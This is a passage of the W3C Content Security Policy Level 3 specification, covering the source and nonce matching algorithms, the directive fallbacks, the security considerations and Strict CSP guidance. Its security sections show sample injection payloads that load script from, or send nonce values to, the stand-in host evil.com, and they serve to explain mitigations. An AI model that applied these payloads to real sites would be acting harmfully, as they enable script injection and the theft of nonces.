"www.example.com".
More
formally,
ASCII
string
pattern
and
host
host
are
said
to
host-part
match
if
the
following
algorithm
returns
"
Matches
":
Note:
The
matching
relation
is
asymmetric.
That
is,
pattern
matching
host
does
not
mean
that
host
will
match
pattern
.
For
example,
*.example.com
host-part
matches
www.example.com
,
but
www.example.com
does
not
host-part
match
*.example.com
.
Note: A future version of this specification may allow literal IPv6 and IPv4 addresses, depending on usage and demand. Given the weak security properties of IP addresses in relation to named hosts, however, authors are encouraged to prefer the latter whenever possible.
-
If host is not a domain , return "
Does Not Match
". -
If pattern is "
*
", return "Matches
". -
If pattern starts with "
*.
":-
Let remaining be pattern with the leading U+002A (
*
) removed and ASCII lowercased . -
If host to ASCII lowercase ends with remaining , then return "
Matches
". -
Return "
Does Not Match
".
-
-
If pattern is not an ASCII case-insensitive match for host , return "
Does Not Match
". -
Return "
Matches
".
6.7.2.11.
port-part
matching
An
ASCII
string
or
null
input
port-part
matches
URL
url
if
a
CSP
source
expression
that
contained
the
first
as
a
port-part
could
potentially
match
a
URL
containing
the
latter’s
port
and
scheme
.
For
example,
"80"
port-part
matches
matches
http://example.com.
-
Assert: input is null, "*", or a sequence of one or more ASCII digits .
-
If input is equal to "*", return "
Matches
". -
Let normalizedInput be null if input null; otherwise input interpreted as decimal number.
-
If normalizedInput equals url ’s port , return "
Matches
". -
If url ’s port is null:
-
Let defaultPort be the default port for url ’s scheme .
-
If normalizedInput equals defaultPort , return "
Matches
".
-
-
Return "
Does Not Match
".
6.7.2.12.
path-part
matching
An
ASCII
string
path
A
path-part
matches
another
ASCII
string
path
B
if
a
CSP
source
expression
that
contained
the
first
as
a
path-part
could
potentially
match
a
URL
containing
the
latter
as
a
path
.
For
example,
we
say
that
"/subdirectory/"
path-part
matches
"/subdirectory/file".
Note: The matching relation is asymmetric. That is, path A matching path B does not mean that path B will match path A .
-
If path A is the empty string, return "
Matches
". -
If path A consists of one character that is equal to the U+002F SOLIDUS character (
/
) and path B is the empty string, return "Matches
". -
Let exact match be
false
if the final character of path A is the U+002F SOLIDUS character (/
), andtrue
otherwise. -
Let path list A and path list B be the result of strictly splitting path A and path B respectively on the U+002F SOLIDUS character (
/
). -
If path list A has more items than path list B , return "
Does Not Match
". -
If exact match is
true
, and path list A does not have the same number of items as path list B , return "Does Not Match
". -
If exact match is
false
:-
Assert: the final item in path list A is the empty string.
-
Remove the final item from path list A .
-
-
For each piece A of path list A :
-
Let piece B be the next item in path list B .
-
Let decoded piece A be the percent-decoding of piece A .
-
Let decoded piece B be the percent-decoding of piece B .
-
If decoded piece A is not decoded piece B , return "
Does Not Match
".
-
-
Return "
Matches
".
6.7.3. Element Matching Algorithms
6.7.3.1. Is element nonceable?
Given
an
Element
element
,
this
algorithm
returns
"
Nonceable
"
if
a
nonce-source
expression
can
match
the
element
(as
discussed
in
§ 7.2
Nonce
Hijacking
),
and
"
Not
Nonceable
"
if
such
expressions
should
not
be
applied.
-
If element does not have an attribute named "
nonce
", return "Not Nonceable
". -
If element is a
script
element, then for each attribute of element ’s attribute list :-
If attribute ’s name contains an ASCII case-insensitive match for "
<script
" or "<style
", return "Not Nonceable
". -
If attribute ’s value contains an ASCII case-insensitive match for "
<script
" or "<style
", return "Not Nonceable
".
-
-
If element had a duplicate-attribute parse error during tokenization, return "
Not Nonceable
".We need some sort of hook in HTML to record this error if we’re planning on using it here. [whatwg/html Issue #3257]
-
Return "
Nonceable
".
This
processing
is
meant
to
mitigate
the
risk
of
dangling
markup
attacks
that
steal
the
nonce
from
an
existing
element
in
order
to
load
injected
script.
It
is
fairly
expensive,
however,
as
it
requires
that
we
walk
through
all
attributes
and
their
values
in
order
to
determine
whether
the
script
should
execute.
Here,
we
try
to
minimize
the
impact
by
doing
this
check
only
for
script
elements
when
a
nonce
is
present,
but
we
should
probably
consider
this
algorithm
as
"at
risk"
until
we
know
its
impact.
[w3c/webappsec-csp
Issue
#98]
6.7.3.2. Does a source list allow all inline behavior for type ?
A
source
list
allows
all
inline
behavior
of
a
given
type
if
it
contains
the
keyword-source
expression
'unsafe-inline'
,
and
does
not
override
that
expression
as
described
in
the
following
algorithm:
Given
a
source
list
list
and
a
string
type
,
the
following
algorithm
returns
"
Allows
"
if
all
inline
content
of
a
given
type
is
allowed
and
"
Does
Not
Allow
"
otherwise.
-
Let allow all inline be
false
. -
For each expression of list :
-
If expression matches the
nonce-source
orhash-source
grammar, return "Does Not Allow
". -
If type is "
script
", "script attribute
" or "navigation
" and expression matches the keyword-source "'strict-dynamic'
", return "Does Not Allow
".Note:
'strict-dynamic'
only applies to scripts, not other resource types. Usage is explained in more detail in § 8.2 Usage of "'strict-dynamic'" . -
If expression is an ASCII case-insensitive match for the
keyword-source
"'unsafe-inline'
", set allow all inline totrue
.
-
-
If allow all inline is
true
, return "Allows
". Otherwise, return "Does Not Allow
".
'unsafe-inline' http://a.com http://b.com 'unsafe-inline'
Source
lists
that
do
not
allow
all
inline
behavior
due
to
the
presence
of
nonces
and/or
hashes,
or
absence
of
'
unsafe-inline
':
'sha512-321cba' 'nonce-abc' http://example.com 'unsafe-inline' 'nonce-abc'
Source
lists
that
do
not
allow
all
inline
behavior
when
type
is
'
script
'
or
'
script
attribute
'
due
to
the
presence
of
'
strict-dynamic
',
but
allow
all
inline
behavior
otherwise:
'unsafe-inline' 'strict-dynamic' http://example.com 'strict-dynamic' 'unsafe-inline'
6.7.3.3. Does element match source list for type and source ?
Given
an
Element
element
,
a
source
list
list
,
a
string
type
,
and
a
string
source
,
this
algorithm
returns
"
Matches
"
or
"
Does
Not
Match
".
Note:
Regardless
of
the
encoding
of
the
document,
source
will
be
converted
to
UTF-8
before
applying
any
hashing
algorithms.
-
If § 6.7.3.2 Does a source list allow all inline behavior for type? returns "
Allows
" given list and type , return "Matches
". -
If type is "
script
" or "style
", and § 6.7.3.1 Is element nonceable? returns "Nonceable
" when executed upon element :-
For each expression of list :
-
If expression matches the
nonce-source
grammar, and element has anonce
attribute whose value is expression ’sbase64-value
part, return "Matches
".
-
Note: Nonces only apply to inline
script
and inlinestyle
, not to attributes of either element or tojavascript:
navigations. -
-
Let unsafe-hashes flag be
false
. -
For each expression of list :
-
If expression is an ASCII case-insensitive match for the
keyword-source
"'unsafe-hashes'
", set unsafe-hashes flag totrue
. Break out of the loop.
-
-
If type is "
script
" or "style
", or unsafe-hashes flag istrue
:-
Set source to the result of executing UTF-8 encode on the result of executing JavaScript string converting on source .
-
For each expression of list :
-
If expression matches the
hash-source
grammar:-
Let algorithm be null.
-
If expression ’s
hash-algorithm
part is an ASCII case-insensitive match for "sha256", set algorithm to SHA-256 . -
If expression ’s
hash-algorithm
part is an ASCII case-insensitive match for "sha384", set algorithm to SHA-384 . -
If expression ’s
hash-algorithm
part is an ASCII case-insensitive match for "sha512", set algorithm to SHA-512 . -
If algorithm is not null:
-
Let actual be the result of base64 encoding the result of applying algorithm to source .
-
Let expected be expression ’s
base64-value
part, with all '-
' characters replaced with '+
', and all '_
' characters replaced with '/
'.Note: This replacement normalizes hashes expressed in base64url encoding into base64 encoding for matching.
-
If actual is identical to expected , return "
Matches
".
-
-
-
Note: Hashes apply to inline
script
and inlinestyle
. If the "'unsafe-hashes'
" source expression is present, they will also apply to event handlers, style attributes andjavascript:
navigations. -
This
should
handle
'strict-dynamic'
for
dynamically
inserted
inline
scripts.
[w3c/webappsec-csp
Issue
#426]
-
Return "
Does Not Match
".
6.8. Directive Algorithms
6.8.1. Get the effective directive for request
Each fetch directive controls a specific destination of request . Given a request request , the following algorithm returns either null or the name of the request’s effective directive :
-
If request ’s initiator is "
prefetch
" or "prerender
", returndefault-src
. -
Switch on request ’s destination , and execute the associated steps:
- the empty string
-
-
Return
connect-src
.
-
-
"
manifest
" -
-
Return
manifest-src
.
-
-
"
object
"- "
embed
" - "
-
-
Return
object-src
.
-
-
"
frame
"- "
iframe
" - "
-
-
Return
frame-src
.
-
-
"
audio
"- "
track
"- "
video
" - "
-
-
Return
media-src
.
-
-
"
font
" -
-
Return
font-src
.
-
-
"
image
" -
-
Return
img-src
.
-
-
"
style
" -
-
Return
style-src-elem
.
-
-
"
script
"- "
xslt
"- "
audioworklet
"- "
paintworklet
" - "
-
-
Return
script-src-elem
.
-
-
"
serviceworker
"- "
sharedworker
"- "
worker
" - "
-
-
Return
worker-src
.
-
-
"
json
"- "
webidentity
" - "
-
-
Return
connect-src
.
-
-
"
report
" -
-
Return null.
-
-
Return
connect-src
.
Note:
The
algorithm
returns
connect-src
as
a
default
fallback.
This
is
intended
for
new
fetch
destinations
that
are
added
and
which
don’t
explicitly
fall
into
one
of
the
other
categories.
6.8.2. Get the effective directive for inline checks
Given a string type , this algorithm returns the name of the effective directive.
Note: While the effective directive is only defined for requests , in this algorithm it is used similarly to mean the directive that is most relevant to a particular type of inline check.
-
Switch on type :
-
"
script
"- "
navigation
" - "
-
-
Return
script-src-elem
.
-
-
"
script attribute
" -
-
Return
script-src-attr
.
-
-
"
style
" -
-
Return
style-src-elem
.
-
-
"
style attribute
" -
-
Return
style-src-attr
.
-
-
"
-
Return null.
6.8.3. Get fetch directive fallback list
Will return an ordered set of the fallback directives for a specific directive . The returned ordered set is sorted from most relevant to least relevant and it includes the effective directive itself.
Given a string directive name :
-
Switch on directive name :
-
"
script-src-elem
" -
-
Return
<< "script-src-elem", "script-src", "default-src" >>
.
-
-
"
script-src-attr
" -
-
Return
<< "script-src-attr", "script-src", "default-src" >>
.
-
-
"
style-src-elem
" -
-
Return
<< "style-src-elem", "style-src", "default-src" >>
.
-
-
"
style-src-attr
" -
-
Return
<< "style-src-attr", "style-src", "default-src" >>
.
-
-
"
worker-src
" -
-
Return
<< "worker-src", "child-src", "script-src", "default-src" >>
.
-
-
"
connect-src
" -
-
Return
<< "connect-src", "default-src" >>
.
-
-
"
manifest-src
" -
-
Return
<< "manifest-src", "default-src" >>
.
-
-
"
object-src
" -
-
Return
<< "object-src", "default-src" >>
.
-
-
"
frame-src
" -
-
Return
<< "frame-src", "child-src", "default-src" >>
.
-
-
"
media-src
" -
-
Return
<< "media-src", "default-src" >>
.
-
-
"
font-src
" -
-
Return
<< "font-src", "default-src" >>
.
-
-
"
img-src
" -
-
Return
<< "img-src", "default-src" >>
.
-
-
"
-
Return
<< >>
.
6.8.4. Should fetch directive execute
This
algorithm
is
used
for
fetch
directives
to
decide
whether
a
directive
should
execute
or
defer
to
a
different
directive
that
is
better
suited.
For
example:
if
the
effective
directive
name
is
worker-src
(meaning
that
we
are
currently
checking
a
worker
request),
a
default-src
directive
should
not
execute
if
a
worker-src
or
script-src
directive
exists.
Given a string effective directive name , a string directive name and a policy policy :
-
Let directive fallback list be the result of executing § 6.8.3 Get fetch directive fallback list on effective directive name .
-
For each fallback directive of directive fallback list :
-
If directive name is fallback directive , Return "
Yes
". -
If policy contains a directive whose name is fallback directive , Return "
No
".
-
-
Return "
No
".
7. Security and Privacy Considerations
7.1. Nonce Reuse
Nonces override the other restrictions present in the directive in which they’re delivered. It is critical, then, that they remain unguessable, as bypassing a resource’s policy is otherwise trivial.
If a server delivers a nonce-source expression as part of a policy , the server MUST generate a unique value each time it transmits a policy. The generated value SHOULD be at least 128 bits long (before encoding), and SHOULD be generated via a cryptographically secure random number generator in order to ensure that the value is difficult for an attacker to predict.
Note: Using a nonce to allow inline script or style is less secure than not using a nonce, as nonces override the restrictions in the directive in which they are present. An attacker who can gain access to the nonce can execute whatever script they like, whenever they like. That said, nonces provide a substantial improvement over 'unsafe-inline' when layering a content security policy on top of old code. When considering 'unsafe-inline' , authors are encouraged to consider nonces (or hashes) instead.
7.2. Nonce Hijacking
7.2.1. Dangling markup attacks
Dangling
markup
attacks
such
as
those
discussed
in
[FILEDESCRIPTOR-2015]
can
be
used
to
repurpose
a
page’s
legitimate
nonces
for
injections.
For
example,
given
an
injection
point
before
a
script
element:
< p > Hello, [INJECTION POINT]</ p > < script nonce = abc src = /good.js ></ script >
If
an
attacker
injects
the
string
"
<script
src='https://evil.com/evil.js'
",
then
the
browser
will
receive
the
following:
< p > Hello,< script src = 'https://evil.com/evil.js' </p > < script nonce= abc src= /good.js></ script >
It
will
then
parse
that
code,
ending
up
with
a
script
element
with
a
src
attribute
pointing
to
a
malicious
payload,
an
attribute
named
</p>
,
an
attribute
named
"
<script
",
a
nonce
attribute,
and
a
second
src
attribute
which
is
helpfully
discarded
as
duplicate
by
the
parser.
The
§ 6.7.3.1
Is
element
nonceable?
algorithm
attempts
to
mitigate
this
specific
attack
by
walking
through
script
or
style
element
attributes,
looking
for
the
string
"
<script
"
or
"
<style
"
in
their
names
or
values.
User-agents must pay particular attention when implementing this algorithm to not ignore duplicate attributes. If an element has a duplicate attribute any instance of the attribute after the first one is ignored but in the § 6.7.3.1 Is element nonceable? algorithm, all attributes including the duplicate ones need to be checked.
Currently the HTML spec’s parsing algorithm removes this information before the § 6.7.3.1 Is element nonceable? algorithm can be run which makes it impossible to actually detect duplicate attributes. [whatwg/html Issue #3257]
For the following example page:
Hello, [INJECTION POINT]< script nonce = abc src = /good.js ></ script >
The following injected string will use a duplicate attribute to attempt to bypass the § 6.7.3.1 Is element nonceable? algorithm check:
Hello,< script src = 'https://evil.com/evil.js' x = "" x = <script nonce = "abcd" src = /good.js ></ script >
7.2.2. Nonce exfiltration via content attributes
Some attacks on CSP rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attacker’s server for reuse. Example:
script[ nonce=a] { background : url ( "https://evil.com/nonce?a" );}
The
nonce
section
talks
about
mitigating
these
types
of
attacks
by
hiding
the
nonce
from
the
element’s
content
attribute
and
moving
it
into
an
internal
slot.
This
is
done
to
ensure
that
the
nonce
value
is
exposed
to
scripts
but
not
any
other
non-script
channels.
7.3. Nonce Retargeting
Nonces
bypass
host-source
expressions,
enabling
developers
to
load
code
from
any
origin.
This,
generally,
is
fine,
and
desirable
from
the
developer’s
perspective.
However,
if
an
attacker
can
inject
a
base
element,
then
an
otherwise
safe
page
can
be
subverted
when
relative
URLs
are
resolved.
That
is,
on
https://example.com/
the
following
code
will
load
https://example.com/good.js
:
< script nonce = abc src = /good.js ></ script >
However,
the
following
will
load
https://evil.com/good.js
:
< base href = "https://evil.com" > < script nonce = abc src = /good.js ></ script >
To
mitigate
this
risk,
it
is
advisable
to
set
an
explicit
base
element
on
every
page,
or
to
limit
the
ability
of
an
attacker
to
inject
their
own
base
element
by
setting
a
base-uri
directive
in
your
page’s
policy.
For
example,
base-uri
'none'
.
7.4. CSS Parsing
The style-src directive restricts the locations from which the protected resource can load styles. However, if the user agent uses a lax CSS parsing algorithm, an attacker might be able to trick the user agent into accepting malicious "stylesheets" hosted by an otherwise trustworthy origin.
These attacks are similar to the CSS cross-origin data leakage attack described by Chris Evans in 2009 [CSS-ABUSE] . User agents SHOULD defend against both attacks using the same mechanism: stricter CSS parsing rules for style sheets with improper MIME types.
7.5. Violation Reports
The
violation
reporting
mechanism
in
this
document
has
been
designed
to
mitigate
the
risk
that
a
malicious
web
site
could
use
violation
reports
to
probe
the
behavior
of
other
servers.
For
example,
consider
a
malicious
web
site
that
allows
https://example.com
as
a
source
of
images.
If
the
malicious
site
attempts
to
load
https://example.com/login
as
an
image,
and
the
example.com
server
redirects
to
an
identity
provider
(e.g.
identityprovider.example.net
),
CSP
will
block
the
request.
If
violation
reports
contained
the
full
blocked
URL,
the
violation
report
might
contain
sensitive
information
contained
in
the
redirected
URL,
such
as
session
identifiers
or
purported
identities.
For
this
reason,
the
user
agent
includes
only
the
URL
of
the
original
request,
not
the
redirect
target.
Note
also
that
violation
reports
should
be
considered
attacker-controlled
data.
Developers
who
wish
to
collect
violation
reports
in
a
dashboard
or
similar
service
should
be
careful
to
properly
escape
their
content
before
rendering
it
(and
should
probably
themselves
use
CSP
to
further
mitigate
the
risk
of
injection).
This
is
especially
true
for
the
"
script-sample
"
property
of
violation
reports,
and
the
sample
property
of
SecurityPolicyViolationEvent
,
which
are
both
completely
attacker-controlled
strings.
7.6. Paths and Redirects
To
avoid
leaking
path
information
cross-origin
(as
discussed
in
Egor
Homakov’s
Using
Content-Security-Policy
for
Evil
),
the
matching
algorithm
ignores
the
path
component
of
a
source
expression
if
the
resource
being
loaded
is
the
result
of
a
redirect.
For
example,
given
a
page
with
an
active
policy
of
img-src
example.com
example.org/path
:
-
Directly loading
https://example.org/not-path
would fail, as it doesn’t match the policy. -
Directly loading
https://example.com/redirector
would pass, as it matchesexample.com
. -
Assuming that
https://example.com/redirector
delivered a redirect response pointing tohttps://example.org/not-path
, the load would succeed, as the initial URL matchesexample.com
, and the redirect target matchesexample.org/path
if we ignore its path component.
This restriction reduces the granularity of a document’s policy when redirects are in play, a necessary compromise to avoid brute-forced information leaks of this type.
The relatively long thread "Remove paths from CSP?" from public-webappsec@w3.org has more detailed discussion around alternate proposals.
7.7. Secure Upgrades
To
mitigate
one
variant
of
history-scanning
attacks
like
Yan
Zhu’s
Sniffly
,
CSP
will
not
allow
pages
to
lock
themselves
into
insecure
URLs
via
policies
like
script-src
http://example.com
.
As
described
in
§ 6.7.2.9
scheme-part
matching
,
the
scheme
portion
of
a
source
expression
will
always
allow
upgrading
to
a
secure
variant.
7.8. CSP Inheriting to avoid bypasses
Documents
loaded
from
local
schemes
will
inherit
a
copy
of
the
policies
in
the
source
document.
The
goal
is
to
ensure
that
a
page
can’t
bypass
its
policy
by
embedding
a
frame
or
opening
a
new
window
containing
content
that
is
entirely
under
its
control
(
srcdoc
documents,
blob:
or
data:
URLs,
about:blank
documents
that
can
be
manipulated
via
document.write()
,
etc).
unsafe-inline
in
the
page’s
execution
context
by
simply
embedding
a
srcdoc
iframe
.
< iframe srcdoc = "<script>alert(1);</script>" ></ iframe >
Note
that
we
create
a
copy
of
the
CSP
list
which
means
that
the
new
Document
’s
CSP
list
is
a
snapshot
of
the
relevant
policies
at
its
creation
time.
Modifications
in
the
CSP
list
of
the
new
Document
won’t
affect
the
source
Document
’s
CSP
list
or
vice-versa.
meta
tag
of
the
iframe.
The
image
outside
the
iframe
will
load
(assuming
the
main
page
policy
does
not
block
it)
since
the
policy
inserted
in
the
iframe
will
not
affect
it.
< iframe srcdoc = '<meta http-equiv="Content-Security-Policy" content="img-src example.com;"> <img src="not-example.com/image">' ></ iframe > < img src = "not-example.com/image" >
8. Authoring Considerations
8.1. The effect of multiple policies
This section is not normative.
The
above
sections
note
that
when
multiple
policies
are
present,
each
must
be
enforced
or
reported,
according
to
its
type.
An
example
will
help
clarify
how
that
ought
to
work
in
practice.
The
behavior
of
an
XMLHttpRequest
might
seem
unclear
given
a
site
that,
for
whatever
reason,
delivered
the
following
HTTP
headers:
Content-Security-Policy: default-src 'self' http://example.com http://example.net; connect-src 'none'; Content-Security-Policy: connect-src http://example.com/; script-src http://example.com/
Is
a
connection
to
example.com
allowed
or
not?
The
short
answer
is
that
the
connection
is
not
allowed.
Enforcing
both
policies
means
that
a
potential
connection
would
have
to
pass
through
both
unscathed.
Even
though
the
second
policy
would
allow
this
connection,
the
first
policy
contains
connect-src
'none'
,
so
its
enforcement
blocks
the
connection.
The
impact
is
that
adding
additional
policies
to
the
list
of
policies
to
enforce
can
only
further
restrict
the
capabilities
of
the
protected
resource.
To
demonstrate
that
further,
consider
a
script
tag
on
this
page.
The
first
policy
would
lock
scripts
down
to
'self'
,
http://example.com
and
http://example.net
via
the
default-src
directive.
The
second,
however,
would
only
allow
script
from
http://example.com/
.
Script
will
only
load
if
it
meets
both
policy’s
criteria:
in
this
case,
the
only
origin
that
can
match
is
http://example.com
,
as
both
policies
allow
it.
8.2.
Usage
of
"
'strict-dynamic'
"
This section is not normative.
Host- and path-based policies are tough to get right, especially on sprawling origins like CDNs. The solutions to Cure53’s H5SC Minichallenge 3: "Sh*t, it’s CSP!" [H5SC3] are good examples of the kinds of bypasses which such policies can enable, and though CSP is capable of mitigating these bypasses via exhaustive declaration of specific resources, those lists end up being brittle, awkward, and difficult to implement and maintain.
The
"
'strict-dynamic'
"
source
expression
aims
to
make
Content
Security
Policy
simpler
to
deploy
for
existing
applications
who
have
a
high
degree
of
confidence
in
the
scripts
they
load
directly,
but
low
confidence
in
their
ability
to
provide
a
reasonable
list
of
resources
to
load
up
front.
If
present
in
a
script-src
or
default-src
directive,
it
has
two
main
effects:
-
host-source and scheme-source expressions, as well as the "
'unsafe-inline'
" and "'self'
keyword-source s will be ignored when loading script.hash-source and nonce-source expressions will be honored.
-
Script requests which are triggered by non- "parser-inserted"
script
elements are allowed.
The
first
change
allows
you
to
deploy
"
'strict-dynamic'
"
in
a
backwards
compatible
way,
without
requiring
user-agent
sniffing:
the
policy
'unsafe-inline'
https:
'nonce-abcdefg'
'strict-dynamic'
will
act
like
'unsafe-inline'
https:
in
browsers
that
support
CSP1,
https:
'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV'
in
browsers
that
support
CSP2,
and
'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV'
'strict-dynamic'
in
browsers
that
support
CSP3.
The second allows scripts which are given access to the page via nonces or hashes to bring in their dependencies without adding them explicitly to the page’s policy.
Content-Security-Policy: script-src 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV' 'strict-dynamic'
And serves the following HTML with that policy active:
...< script src = "https://cdn.example.com/script.js" nonce = "DhcnhD3khTMePgXwdayK9BsMqXjhguVV" ></ script > ...
This
will
generate
a
request
for
https://cdn.example.com/script.js
,
which
will
not
be
blocked
because
of
the
matching
nonce
attribute.
If
script.js
contains
the
following
code:
var s= document. createElement( 'script' ); s. src= 'https://othercdn.not-example.net/dependency.js' ; document. head. appendChild( s); document. write( '<scr' + 'ipt src="/sadness.js"></scr' + 'ipt>' );
dependency.js
will
load,
as
the
script
element
created
by
createElement()
is
not
"parser-inserted"
.
sadness.js
will
not
load,
however,
as
document.write()
produces
script
elements
which
are
"parser-inserted"
.
Note: With 'strict-dynamic' , scripts created at runtime will be allowed to execute. If the location of such a script can be controlled by an attacker, the policy will then allow the loading of arbitrary scripts. Developers that use 'strict-dynamic' in their policy should audit the uses of non-parser-inserted APIs and ensure that they are not invoked with potentially untrusted data. This includes applications or frameworks that tend to determine script locations at runtime.
8.3.
Usage
of
"
'unsafe-hashes'
"
This section is not normative.
Legacy
websites
and
websites
with
legacy
dependencies
might
find
it
difficult
to
entirely
externalize
event
handlers.
These
sites
could
enable
such
handlers
by
allowing
'unsafe-inline'
,
but
that’s
a
big
hammer
with
a
lot
of
associated
risk
(and
cannot
be
used
in
conjunction
with
nonces
or
hashes).
The
"
'unsafe-hashes'
"
source
expression
aims
to
make
CSP
deployment
simpler
and
safer
in
these
situations
by
allowing
developers
to
enable
specific
handlers
via
hashes.
< button id = "action" onclick = "doSubmit()" >
Rather
than
reducing
security
by
specifying
"
'unsafe-inline'
",
they
decide
to
use
"
'unsafe-hashes'
"
along
with
a
hash
source
expression
corresponding
to
doSubmit()
,
as
follows:
Content-Security-Policy: script-src 'unsafe-hashes' 'sha256-jzgBGA4UWFFmpOBq0JpdsySukE1FrEN5bUpoK8Z29fY='
The
capabilities
'unsafe-hashes'
provides
is
useful
for
legacy
sites,
but
should
be
avoided
for
modern
sites.
In
particular,
note
that
hashes
allow
a
particular
script
to
execute,
but
do
not
ensure
that
it
executes
in
the
way
a
developer
intends.
If
an
interesting
capability
is
exposed
as
an
inline
event
handler
(say
<a
onclick="transferAllMyMoney()">Transfer</a>
),
then
that
script
becomes
available
for
an
attacker
to
inject
as
<script>transferAllMyMoney()</script>
.
Developers
should
be
careful
to
balance
the
risk
of
allowing
specific
scripts
to
execute
against
the
deployment
advantages
that
allowing
inline
event
handlers
might
provide.
8.4. Allowing external JavaScript via hashes
This section is not normative.
In [CSP2] , hash source expressions could only match inlined script, but now that Subresource Integrity [SRI] is widely deployed, we can expand the scope to enable externalized JavaScript as well.
If
multiple
sets
of
integrity
metadata
are
specified
for
a
script
,
the
request
will
match
a
policy’s
hash-source
s
if
and
only
if
each
item
in
a
script
’s
integrity
metadata
matches
the
policy.
Note:
The
CSP
spec
specifies
that
the
contents
of
an
inline
script
element
or
event
handler
needs
to
be
encoded
using
UTF-8
encode
before
computing
its
hash.
[SRI]
computes
the
hash
on
the
raw
resource
that
is
being
fetched
instead.
This
means
that
it
is
possible
for
the
hash
needed
to
allow
an
inline
script
block
to
be
different
from
the
hash
needed
to
allow
an
external
script
even
if
they
have
identical
contents.
Content-Security-Policy: script-src 'sha256-abc123' 'sha512-321cba'
In
the
presence
of
that
policy,
the
following
script
elements
would
be
allowed
to
execute
because
they
contain
only
integrity
metadata
that
matches
the
policy:
< script integrity = "sha256-abc123" ...></ script > < script integrity = "sha512-321cba" ...></ script > < script integrity = "sha256-abc123 sha512-321cba" ...></ script >
While
the
following
script
elements
would
not
execute
because
they
contain
valid
metadata
that
does
not
match
the
policy
(even
though
other
metadata
does
match):
< script integrity = " sha384-xyz789 " ...></ script > < script integrity = " sha384-xyz789 sha512-321cba" ...></ script > < script integrity = "sha256-abc123 sha384-xyz789 sha512-321cba" ...></ script >
Metadata that is not recognized (either because it’s entirely invalid, or because it specifies a not-yet-supported hashing algorithm) does not affect the behavior described here. That is, the following elements would be allowed to execute in the presence of the above policy, as the additional metadata is invalid and therefore wouldn’t allow a script whose content wasn’t listed explicitly in the policy to execute:
< script integrity = "sha256-abc123 sha1024-abcd " ...></ script > < script integrity = "sha512-321cba entirely-invalid " ...></ script > < script integrity = "sha256-abc123 not-a-hash-at-all sha512-321cba" ...></ script >
8.5. Strict CSP
This section is not normative.
Deployment of an effective CSP against XSS is a challenge (as described in CSP Is Dead, Long Live CSP! [LONG-LIVE-CSP] ). However, enforcing the following set of CSP directives has been identified as an effective and deployable mitigation against XSS.
-
script-src : Only use nonce source-expression and/or hash source-expression with the " 'strict-dynamic' " keyword-source .
Note: While " 'strict-dynamic' " allows ease of deployment (as described in § 8.2 Usage of "'strict-dynamic'" ), it should be avoided when possible.
Note: For backwards compatibility, it is recommended to specify https: scheme-source with " 'strict-dynamic' ".
-
base-uri : Specify a value of either " 'self' " or " 'none' ".
A CSP that meets the above criteria is called Strict CSP. Further details are discussed in [WEBDEV-STRICTCSP] .
Nonce-based Strict CSP:
Content-Security-Policy: script-src 'strict-dynamic' 'nonce-{RANDOM}'; base-uri 'self';
Hash-based Strict CSP:
Content-Security-Policy: script-src 'strict-dynamic' 'sha256-{HASHED_INLINE_SCRIPT}'; base-uri 'self';
8.6. Exfiltration
This section is not normative.
Data exfiltration can occur when the contents of the request, such as the URL, contain information about the user or page that should be restricted and not shared.
Content
Security
Policy
can
mitigate
data
exfiltration
if
used
to
create
allowlists
of
servers
with
which
a
page
is
allowed
to
communicate.
Note
that
a
policy
which
lacks
the
default-src
directive
cannot
mitigate
exfiltration,
as
there
are
kinds
of
requests
that
are
not
addressable
through
a
more-specific
directive
(
prefetch
,
for
example).
[HTML]
fetch()
,
prefetch
,
etc):
[HTML]
Content-Security-Policy: img-src 'none'; script-src 'none'; font-src 'none'
Supplementing
this
policy
with
default-src
'none'
would
improve
the
page’s
robustness
against
this
kind
of
attack.
Content-Security-Policy: default-src 'none'; img-src *
9. Implementation Considerations
9.1. Vendor-specific Extensions and Addons
Policy enforced on a resource SHOULD NOT interfere with the operation of user-agent features like addons, extensions, or bookmarklets. These kinds of features generally advance the user’s priority over page authors, as espoused in [HTML-DESIGN] .
Moreover, applying CSP to these kinds of features produces a substantial amount of noise in violation reports, significantly reducing their value to developers.
Chrome,
for
example,
excludes
the
chrome-extension:
scheme
from
CSP
checks,
and
does
some
work
to
ensure
that
extension-driven
injections
are
allowed,
regardless
of
a
page’s
policy.
10. IANA Considerations
10.1. Directive Registry
The Content Security Policy Directive registry should be updated with the following directives and references [RFC7762] :
-
base-uri
-
This document (see § 6.3.1 base-uri )
-
child-src
-
This document (see § 6.1.1 child-src )
-
connect-src
-
This document (see § 6.1.2 connect-src )
-
default-src
-
This document (see § 6.1.3 default-src )
-
font-src
-
This document (see § 6.1.4 font-src )
-
form-action
-
This document (see § 6.4.1 form-action )
-
frame-ancestors
-
This document (see § 6.4.2 frame-ancestors )
-
frame-src
-
This document (see § 6.1.5 frame-src )
-
img-src
-
This document (see § 6.1.6 img-src )
-
manifest-src
-
This document (see § 6.1.7 manifest-src )
-
media-src
-
This document (see § 6.1.8 media-src )
-
object-src
-
This document (see § 6.1.9 object-src )
-
report-uri
-
This document (see § 6.5.1 report-uri )
-
report-to
-
This document (see § 6.5.2 report-to )
-
sandbox
-
This document (see § 6.3.2 sandbox )
-
script-src
-
This document (see § 6.1.10 script-src )
-
script-src-attr
-
This document (see § 6.1.12 script-src-attr )
-
script-src-elem
-
This document (see § 6.1.11 script-src-elem )
-
style-src
-
This document (see § 6.1.13 style-src )
-
style-src-attr
-
This document (see § 6.1.15 style-src-attr )
-
style-src-elem
-
This document (see § 6.1.14 style-src-elem )
-
worker-src
-
This document (see § 6.2.2 worker-src )
10.2. Headers
The permanent message header field registry should be updated with the following registrations: [RFC3864]
10.2.1. Content-Security-Policy
- Header field name
- Content-Security-Policy
- Applicable protocol
- http
- Status
- standard
- Author/Change controller
- W3C
- Specification document
- This specification (See § 3.1 The Content-Security-Policy HTTP Response Header Field )
10.2.2. Content-Security-Policy-Report-Only
- Header field name
- Content-Security-Policy-Report-Only
- Applicable protocol
- http
- Status
- standard
- Author/Change controller
- W3C
- Specification document
- This specification (See § 3.2 The Content-Security-Policy-Report-Only HTTP Response Header Field )
11. Acknowledgements
Lots of people are awesome. For instance:
-
Mario and all of Cure53.
-
Artur Janc, Michele Spagnuolo, Lukas Weichselbaum, Jochen Eisinger, and the rest of Google’s CSP Cabal.